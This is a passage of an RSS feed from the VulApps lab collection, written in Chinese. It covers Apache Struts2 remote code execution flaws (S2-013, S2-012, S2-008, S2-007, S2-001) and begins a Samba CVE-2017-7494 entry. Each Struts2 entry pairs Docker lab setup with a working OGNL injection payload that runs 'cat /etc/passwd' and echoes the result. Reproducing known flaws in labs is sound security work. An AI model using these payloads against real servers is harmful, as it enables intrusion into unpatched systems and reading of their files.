&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-013
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-013
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('cat /etc/passwd').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-013/s2-013-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:56 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-013/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-013/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-012)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-012.html&quot;&gt;S2-012 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-012
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-012
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{&quot;cat&quot;, &quot;/etc/passwd&quot;})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-012/s2-012-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-012/s2-012-2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:55 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-012/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-012/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-008)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-008.html&quot;&gt;S2-008 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-008
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-008
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;/devmode.action?debug=command&amp;amp;expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat /etc/passwd%27%29.getInputStream%28%29%29)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-008/s2-008-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:54 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-008/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-008/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-007)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-007.html&quot;&gt;S2-007 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-007
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-007
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行(命令加参数：getRuntime().exec(‘cat /etc/passwd’))&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;' + (#_memberAccess[&quot;allowStaticMethodAccess&quot;]=true,#foo=new java.lang.Boolean(&quot;false&quot;) ,#context[&quot;xwork.MethodAccessor.denyMethodExecution&quot;]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())) + '
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-007/s2-007-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-007/s2-007-2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:53 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-007/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-007/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-001)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt;
.highlight pre{
  white-space: pre-wrap;
}    
&lt;/style&gt;

&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://struts.apache.org/docs/s2-001.html&quot;&gt;S2-001 公告&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;参考 &lt;a href=&quot;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&quot;&gt;http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt;

&lt;ol&gt;
  &lt;li&gt;拉取镜像到本地
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-001
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
  &lt;/li&gt;
  &lt;li&gt;启动环境
    &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-001
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;    &lt;/div&gt;
    &lt;blockquote&gt;
      &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt;
    &lt;/blockquote&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt;

&lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt;

&lt;p&gt;命令执行(命令加参数：&lt;code class=&quot;highlighter-rouge&quot;&gt;new java.lang.String[]{&quot;cat&quot;,&quot;/etc/passwd&quot;}&lt;/code&gt;)&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{&quot;cat&quot;,&quot;/etc/passwd&quot;})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-001/S2-001-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-001/S2-001-2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;其它&quot;&gt;其它&lt;/h3&gt;

&lt;p&gt;感谢 &lt;a href=&quot;https://github.com/zerokeeper&quot;&gt;@zerokeeper&lt;/a&gt; 贡献&lt;/p&gt;
</description>
        <pubDate>Tue, 13 Jun 2017 10:43:52 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-001/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-001/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Samba远程代码执行漏洞(CVE-2017-7494)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。&lt;/p&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://www.samba.org/samba/security/CVE-2017-7494.html&quot;&gt;Remote code execution from a writable share.&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;值&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;samba 端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;445&lt;/code&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_samba_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 445:445 &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 139:139 &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 138:138 &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 137:137 medicean/vulapps:s_samba_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 445:445&lt;/code&gt; 前面的 445 代表物理机的端口&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;利用步骤&quot;&gt;利用步骤&lt;/h3&gt; &lt;p&gt;假定目标 IP 是： 192.168.35.197&lt;/p&gt; &lt;figure...</description>
        <pubDate>Thu, 25 May 2017 05:29:51 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_samba_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_samba_1/</guid>
        
        <category>Samba</category>
        
        <category>RCE</category>
        
        
        <category>Samba</category>
        
      </item>
    
  </channel>
</rss>
